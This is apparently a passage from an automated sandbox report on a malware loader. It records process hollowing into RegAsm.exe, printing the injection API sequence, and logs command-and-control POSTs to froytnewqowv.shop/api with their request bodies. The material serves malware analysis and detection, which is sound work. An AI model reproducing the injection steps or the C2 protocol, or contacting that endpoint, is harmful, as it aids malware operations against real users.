      Aug 29, 2024 23:43:00.585910082 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.586230993 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:00.586242914 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.050184011 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.050251007 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.052676916 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.052683115 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.052942038 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.054641962 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.054658890 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.054703951 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.536679029 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.536750078 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.536885977 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.568384886 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.568407059 CEST44349705188.114.97.3192.168.2.5
      Aug 29, 2024 23:43:01.568418026 CEST49705443192.168.2.5188.114.97.3
      Aug 29, 2024 23:43:01.568423033 CEST44349705188.114.97.3192.168.2.5
      TimestampSource PortDest PortSource IPDest IP
      Aug 29, 2024 23:42:59.777044058 CEST5379953192.168.2.51.1.1.1
      Aug 29, 2024 23:42:59.795326948 CEST53537991.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Aug 29, 2024 23:42:59.777044058 CEST192.168.2.51.1.1.10x78ebStandard query (0)froytnewqowv.shopA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Aug 29, 2024 23:42:59.795326948 CEST1.1.1.1192.168.2.50x78ebNo error (0)froytnewqowv.shop188.114.97.3A (IP address)IN (0x0001)false
      Aug 29, 2024 23:42:59.795326948 CEST1.1.1.1192.168.2.50x78ebNo error (0)froytnewqowv.shop188.114.96.3A (IP address)IN (0x0001)false
      • froytnewqowv.shop
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.549704188.114.97.34434308C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-08-29 21:43:00 UTC264OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: froytnewqowv.shop
      2024-08-29 21:43:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
      Data Ascii: act=life
      2024-08-29 21:43:00 UTC553INHTTP/1.1 200 OK
      Date: Thu, 29 Aug 2024 21:43:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NhGSvZgi3RMDTuQR6L0r6luxoipvvZqmdAtpyygrVuO5jevo60vk135JLluBSLin96cZHvG1byE6AaC%2BvNabv%2FDjOD%2FJEgv1Bdy0V5t7ws8CnBlDmkV3hVhXK34dWbWpOeEQA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8bafb6d38bbb5e71-EWR
      2024-08-29 21:43:00 UTC816INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
      Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
      2024-08-29 21:43:00 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
      Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
      2024-08-29 21:43:00 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 57 50 73 57 4d 38 35 4b 75 6b 6d 6a 4d 55 73 72 65 34 6a 44 43 5f 76 6b 49 59 50 67 54 38 43 6b 46 57 64 63 55 47 68 38 69 70 6b 2d 31 37 32 34 39 36 37 37 38 30 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20
      Data Ascii: <input type="hidden" name="atok" value="WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
      2024-08-29 21:43:00 UTC851INData Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c
      Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
      2024-08-29 21:43:00 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.549705188.114.97.34434308C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-08-29 21:43:01 UTC354OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Cookie: __cf_mw_byp=WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 51
      Host: froytnewqowv.shop
      2024-08-29 21:43:01 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 30 33 33 32 32 39 30 35 26 6a 3d
      Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--503322905&j=
      2024-08-29 21:43:01 UTC806INHTTP/1.1 200 OK
      Date: Thu, 29 Aug 2024 21:43:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=3f7imunjumcpcr6hudinoa52rc; expires=Mon, 23-Dec-2024 15:29:40 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TrImBqBS5zXe4GejQ2GxLDXBT4ejxWRv%2FDLNe012p0vAf%2FZjGVqpWb4pR%2BUW6yNYLehNvwMy5CczcwFNuJJZyGmI8yqJy8QwkjRUOSpxRT4KWd04Kob%2BULM4s6WuySwRwfNvA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8bafb6d80fb4423d-EWR
      alt-svc: h3=":443"; ma=86400
      2024-08-29 21:43:01 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
      Data Ascii: aerror #D12
      2024-08-29 21:43:01 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:17:42:59
      Start date:29/08/2024
      Path:C:\Users\user\Desktop\Loader.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\Loader.exe"
      Imagebase:0xb20000
      File size:318'464 bytes
      MD5 hash:C7ACFF9E420DB036AB543E95341B8C8B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:17:42:59
      Start date:29/08/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:17:42:59
      Start date:29/08/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0xb20000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:6
      Start time:17:43:01
      Start date:29/08/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768
      Imagebase:0x250000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:27.9%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:52.4%
        Total number of Nodes:21
        Total number of Limit Nodes:0

        Callgraph

        • Executed
        • Not Executed
        • Opacity -> Relevance
        • Disassembly available
        callgraph 0 Function_015304D1 1 Function_01530450 2 Function_015300D4 3 Function_02E22BEB 4 Function_02E22B6B 5 Function_0153045C 6 Function_01530140 7 Function_01530444 8 Function_02E22B7B 9 Function_02E22BFB 10 Function_015304C9 11 Function_01530848 12 Function_015300C8 13 Function_015304CD 14 Function_0153004D 15 Function_015300F0 16 Function_01530070 17 Function_01530474 18 Function_02E22B4B 19 Function_02E22BCB 20 Function_01530979 21 Function_015304FC 20->21 34 Function_01530514 20->34 50 Function_01530508 20->50 22 Function_02E222D2 23 Function_015308E3 24 Function_01530060 25 Function_015304E7 26 Function_015300E4 27 Function_02E22B5B 28 Function_02E22BDB 29 Function_015308E8 30 Function_01530468 31 Function_01530491 32 Function_01530090 33 Function_01530495 35 Function_02E22BAB 36 Function_02E22B2B 37 Function_01530499 38 Function_0153049D 39 Function_0153011C 40 Function_01530481 41 Function_01531101 42 Function_01530100 43 Function_01530080 44 Function_01530A80 45 Function_01530485 46 Function_02E22B3B 47 Function_02E22BBB 48 Function_01530489 49 Function_01530988 49->21 49->34 49->50 51 Function_0153048D 52 Function_0153010C 53 Function_015300B0 54 Function_01530A37 55 Function_02E22B8B 56 Function_015300BC 57 Function_015304BC 58 Function_02E22B12 59 Function_015304A1 60 Function_015300A0 61 Function_01530520 62 Function_01530B20 63 Function_015304A5 64 Function_02E22B1B 65 Function_02E22B9B 66 Function_02E2249D 67 Function_0153012C

        Control-flow Graph

        APIs
        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E2240F,02E223FF), ref: 02E2260C
        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02E2261F
        • Wow64GetThreadContext.KERNEL32(000002E8,00000000), ref: 02E2263D
        • ReadProcessMemory.KERNELBASE(000002EC,?,02E22453,00000004,00000000), ref: 02E22661
        • VirtualAllocEx.KERNELBASE(000002EC,?,?,00003000,00000040), ref: 02E2268C
        • WriteProcessMemory.KERNELBASE(000002EC,00000000,?,?,00000000,?), ref: 02E226E4
        • WriteProcessMemory.KERNELBASE(000002EC,00400000,?,?,00000000,?,00000028), ref: 02E2272F
        • WriteProcessMemory.KERNELBASE(000002EC,-00000008,?,00000004,00000000), ref: 02E2276D
        • Wow64SetThreadContext.KERNEL32(000002E8,02E00000), ref: 02E227A9
        • ResumeThread.KERNELBASE(000002E8), ref: 02E227B8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2034432874.0000000002E22000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E22000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_2e22000_Loader.jbxd
        Similarity
        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
        • API String ID: 2687962208-1257834847
        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
        • Instruction ID: f8a1930da6dc2330fde8998e1744bf51e516bc17606577771202d6ecaf700d95
        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
        • Instruction Fuzzy Hash: 05B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 23 1530b20-1530b81 26 1530b83-1530b97 23->26 28 1530b9d-1530bf6 26->28 29 153102c-15310ce VirtualProtect 26->29 28->29 30 1530bfc-1530c0a 28->30 38 15310d0 29->38 39 15310d5-15310ee 29->39 30->29 32 1530c10-1530c1b 30->32 32->26 34 1530c21-1530c23 32->34 35 1530c26-1530c34 34->35 35->29 37 1530c3a-1530c4a 35->37 37->29 40 1530c50-1530c5c 37->40 38->39 41 1530c65-1530c72 40->41 42 1530c5e-1530c64 40->42 41->29 43 1530c78-1530c85 41->43 42->41 43->29 45 1530c8b-1530c9a 43->45 45->29 46 1530ca0-1530cab 45->46 46->35 47 1530cb1-1530cc3 46->47 48 1531024-153102b 47->48 49 1530cc9-1530cd7 47->49 50 1530ce1-1530cef 49->50 51 1530cd9-1530ce0 49->51 50->29 52 1530cf5-1530d01 50->52 51->50 53 1530d03-1530d09 52->53 54 1530d0a-1530d17 52->54 53->54 54->29 55 1530d1d-1530d2a 54->55 55->29 56 1530d30-1530d3f 55->56 56->29 57 1530d45-1530d6a 56->57 58 1530d74-1530eb9 57->58 59 1530d6c-1530d73 57->59 62 1530ebb-1530ec3 58->62 63 1530ec9-1530ed2 58->63 59->58 62->63 64 1530ed4 63->64 65 1530edd-1530ee6 63->65 66 1530ed6-1530edb 64->66 67 1530ee9-1530f17 64->67 65->67 66->65 66->67 68 1530f19 67->68 69 1530f1f-1530f29 67->69 68->69 70 1530f1b-1530f1d 68->70 71 1530f34-1530f42 69->71 72 1530f2b 69->72 70->69 75 1530f6b-1530f77 71->75 73 1530f44-1530f65 72->73 74 1530f2d-1530f32 72->74 73->75 74->71 74->73 76 1530f86-1530f8d 75->76 77 1530f79-1530f83 75->77 78 1530f91-1530fa0 76->78 79 1530f8f 76->79 77->76 80 1530fa6-1530fb8 78->80 79->80 81 1530fc0 80->81 82 1530fba 80->82 85 1530fe9-1530ff5 81->85 83 1530fc2-1530fdf 82->83 84 1530fbc-1530fbe 82->84 83->85 84->81 84->83 85->29 86 1530ff7-1531006 85->86 86->29 87 1531008-153101e 86->87 87->48 87->49
        APIs
        • VirtualProtect.KERNELBASE(03E23594,?,?,?), ref: 015310C1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2034342615.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1530000_Loader.jbxd
        Similarity
        • API ID: ProtectVirtual
        • String ID: #l>@$&S!
        • API String ID: 544645111-1705501573
        • Opcode ID: 9efbd8c32260de1e11e686d1fb280eaf4cba4c54eea6fe794c113c3d577c4706
        • Instruction ID: 4e46d3327c37d078f21f5ef3f9836a16005eeaeacc7ff5ffdf1418b1b7a72ea1
        • Opcode Fuzzy Hash: 9efbd8c32260de1e11e686d1fb280eaf4cba4c54eea6fe794c113c3d577c4706
        • Instruction Fuzzy Hash: 73F18FB0E016698FDB21CFA9C980B9DFBB2BF84310F148599E559AB342C734AD85CF54

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 89 1530508-15310ce VirtualProtect 92 15310d0 89->92 93 15310d5-15310ee 89->93 92->93
        APIs
        • VirtualProtect.KERNELBASE(03E23594,?,?,?), ref: 015310C1
        Memory Dump Source
        • Source File: 00000000.00000002.2034342615.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1530000_Loader.jbxd
        Similarity
        • API ID: ProtectVirtual
        • String ID:
        • API String ID: 544645111-0
        • Opcode ID: dbff53e87c27c968e53628935ba0ff0e5a3ae50134a0f386d946f7f05260e294
        • Instruction ID: 4963618bc7c67ca6973be223d227be3edc70ff2a07a1ad6d0f6ffd7c0e364726
        • Opcode Fuzzy Hash: dbff53e87c27c968e53628935ba0ff0e5a3ae50134a0f386d946f7f05260e294
        • Instruction Fuzzy Hash: 5B21E0B5904659AFCB10DF9AD884ADEFBF4FB48310F10852AE918A7200C774A954CFE1

        Execution Graph

        Execution Coverage:1.7%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:24.4%
        Total number of Nodes:86
        Total number of Limit Nodes:17
        execution_graph 15894 40a9a0 15895 40a9a9 15894->15895 15896 40a9b7 ExitProcess 15895->15896 15897 40a9b9 GetCurrentProcess 15895->15897 15899 40a9c4 15897->15899 15900 40a9ca GetWindowInfo 15899->15900 15904 40a9c8 15899->15904 15909 40b810 15900->15909 15903 40a9e5 15903->15904 15905 40a9eb 15903->15905 15922 43c6c0 15904->15922 15918 40dcf0 15905->15918 15910 40b8b0 LoadLibraryExW 15909->15910 15911 40b863 15909->15911 15917 40b8c9 15910->15917 15911->15910 15912 40bd48 CoInitializeEx 15913 40bd5a CoInitializeSecurity 15912->15913 15916 40bd84 15912->15916 15914 40bd7a 15913->15914 15913->15916 15925 4365e0 15914->15925 15916->15903 15917->15912 15917->15916 15921 40dd2f 15918->15921 15919 40e1b0 15920 40e137 GetSystemDirectoryW 15920->15921 15921->15919 15921->15920 15928 43db10 15922->15928 15924 43c6c5 FreeLibrary 15924->15896 15926 43665f 15925->15926 15927 4366d6 CoCreateInstance 15926->15927 15927->15926 15927->15927 15929 43db19 15928->15929 15929->15924 15930 43c982 15932 43c8d4 15930->15932 15931 43c9fe 15932->15931 15935 43c800 LdrInitializeThunk 15932->15935 15934 43ca28 15935->15934 15936 43a762 RtlAllocateHeap 15937 43a7a2 15938 43a812 RtlFreeHeap 15937->15938 15939 43a7b0 15937->15939 15940 43a81e 15937->15940 15938->15940 15939->15938 15941 43d0e1 15942 43d0e0 15941->15942 15942->15941 15944 43d0ee 15942->15944 15948 43c800 LdrInitializeThunk 15942->15948 15947 43c800 LdrInitializeThunk 15944->15947 15946 43d22e 15947->15946 15948->15944 15949 43cff1 15950 43cffb 15949->15950 15951 43ce32 15949->15951 15951->15949 15951->15950 15954 43c800 LdrInitializeThunk 15951->15954 15953 43cfe6 15954->15953 15955 43ca31 15956 43ca62 15955->15956 15959 43c800 LdrInitializeThunk 15956->15959 15958 43caef 15959->15958 15960 43eaa0 15961 43eac0 15960->15961 15961->15961 15962 43ec1e 15961->15962 15964 43c800 LdrInitializeThunk 15961->15964 15964->15962 15965 436728 15966 436797 SysAllocString 15965->15966 15967 43676a 15965->15967 15968 4367bd 15966->15968 15967->15966 15969 43bc78 15970 43bcec LoadLibraryExW 15969->15970 15971 43bcbc 15969->15971 15972 43bd03 15970->15972 15971->15970 15972->15972 15973 43680f 15974 4367f0 CoSetProxyBlanket 15973->15974 15975 4367c9 15973->15975 15976 4367cf CoSetProxyBlanket 15973->15976 15974->15975 15975->15973 15975->15976 15976->15974 15977 43681d 15978 436841 15977->15978 15979 436877 SysAllocString 15977->15979 15978->15979 15980 43692e SysAllocString 15979->15980 15981 4368ed 15979->15981 15989 43694f 15980->15989 15981->15980 15982 436c24 15986 436c2c SysFreeString SysFreeString 15982->15986 15983 436994 VariantInit 15990 4369f0 15983->15990 15984 436c14 VariantClear 15984->15982 15985 436a4e SysStringLen 15993 436a6e 15985->15993 15988 436c48 SysFreeString 15986->15988 15987 436c9a 15991 436c5a 15988->15991 15989->15982 15989->15983 15989->15984 15989->15985 15989->15986 15989->15993 15990->15984 15990->15985 15990->15993 15992 436c73 GetVolumeInformationW 15991->15992 15992->15987 15993->15984 15993->15987

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 43681d-43683f 1 436841 0->1 2 436877-4368eb SysAllocString 0->2 3 436850-436875 1->3 4 43692e-436954 SysAllocString 2->4 5 4368ed-4368ef 2->5 3->2 3->3 8 436bb0-436be6 4->8 9 436c24-436c28 4->9 10 436994-4369ee VariantInit 4->10 11 436c14-436c20 VariantClear 4->11 12 43695b-436971 4->12 13 436c09-436c11 call 40a310 4->13 14 436a4e-436a6c SysStringLen 4->14 15 436bfd-436c00 4->15 16 436bed-436bf6 4->16 17 436c2c-436c93 SysFreeString * 3 call 43e080 GetVolumeInformationW 4->17 6 4368f0-43692c 5->6 6->4 6->6 8->11 8->13 8->15 8->16 23 436e72 8->23 24 436e30-436e40 8->24 25 436e47-436e54 8->25 26 436eca-436ed1 8->26 27 436c9a-436ca9 8->27 9->17 18 4369f0-436a23 10->18 19 436a25-436a32 10->19 11->9 33 436975-43698d 12->33 13->11 21 436aa9 14->21 22 436a6e-436a72 14->22 15->13 16->8 16->11 16->13 16->15 16->16 16->23 16->24 16->25 16->26 16->27 17->23 17->24 17->25 17->26 17->27 18->18 18->19 34 436a36-436a47 19->34 31 436aab-436ac2 call 40a300 21->31 29 436a82-436a85 22->29 24->23 24->25 25->23 32 436e5b-436e67 25->32 27->23 27->24 27->25 27->26 29->31 35 436a87-436aa3 29->35 42 436ac8-436acf 31->42 43 436b8f-436b9c 31->43 32->23 33->8 33->9 33->10 33->11 33->13 33->14 33->15 33->16 34->8 34->11 34->13 34->14 34->15 34->16 37 436aa5-436aa7 35->37 38 436a74-436a80 35->38 37->38 38->29 38->31 42->43 45 436ad5-436ae1 42->45 43->8 43->11 43->13 43->15 43->16 43->23 43->24 43->25 43->26 43->27 46 436ae4-436aeb 45->46 46->43 47 436af1-436af5 46->47 48 436b00-436b10 47->48 49 436af7-436afe 47->49 51 436b12-436b18 48->51 52 436b3d-436b4b 48->52 50 436b7a-436b7f 49->50 50->43 55 436b81-436b89 50->55 51->52 53 436b1a-436b3b 51->53 52->50 54 436b4d-436b75 52->54 53->50 54->50 55->43 55->46
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: String$Alloc$InitVariant
        • String ID: YmC$rnC
        • API String ID: 3520221836-3969294163
        • Opcode ID: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
        • Instruction ID: f7ea2be89283f713bd0516aaaec10ec30aeb0a5355e630bcd4f8e36aece2a8e2
        • Opcode Fuzzy Hash: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
        • Instruction Fuzzy Hash: 85E17A75604B419FD328CF29C891B26B7F2FF49310F15892DD5968BBA1D739E442CB44

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 56 40b810-40b861 57 40b8b0-40b8cd LoadLibraryExW call 43b9f0 56->57 58 40b863 56->58 62 40b8d3-40b9fa call 43e080 * 12 57->62 63 40bfea-40bff6 57->63 59 40b870-40b8ae 58->59 59->57 59->59 88 40ba00-40ba18 call 437270 62->88 91 40ba20-40ba27 88->91 91->91 92 40ba29-40ba3b 91->92 93 40baa1-40bab1 call 40c000 92->93 94 40ba3d-40ba46 92->94 101 40bab7-40babd 93->101 102 40bd08-40bd10 93->102 96 40ba50-40ba53 94->96 98 40ba90-40ba93 96->98 99 40ba55-40ba74 call 40db90 96->99 100 40ba96-40ba9a 98->100 112 40ba76-40ba7c 99->112 113 40ba7e-40ba84 99->113 100->93 101->88 104 40bac3-40bbb8 101->104 105 40bd12-40bd17 102->105 106 40bd3f 102->106 108 40bbba 104->108 109 40bc0b-40bc24 call 40c5e0 104->109 110 40bd20-40bd32 105->110 111 40bd48-40bd54 CoInitializeEx 106->111 114 40bbc0-40bc09 108->114 117 40bfe8 109->117 122 40bc2a-40bc7f 109->122 110->110 116 40bd34-40bd3d 110->116 111->117 118 40bd5a-40bd74 CoInitializeSecurity 111->118 112->96 112->113 113->100 114->109 114->114 116->111 117->63 118->117 120 40bd7a-40bd7f call 4365e0 118->120 123 40bd84-40bd89 120->123 124 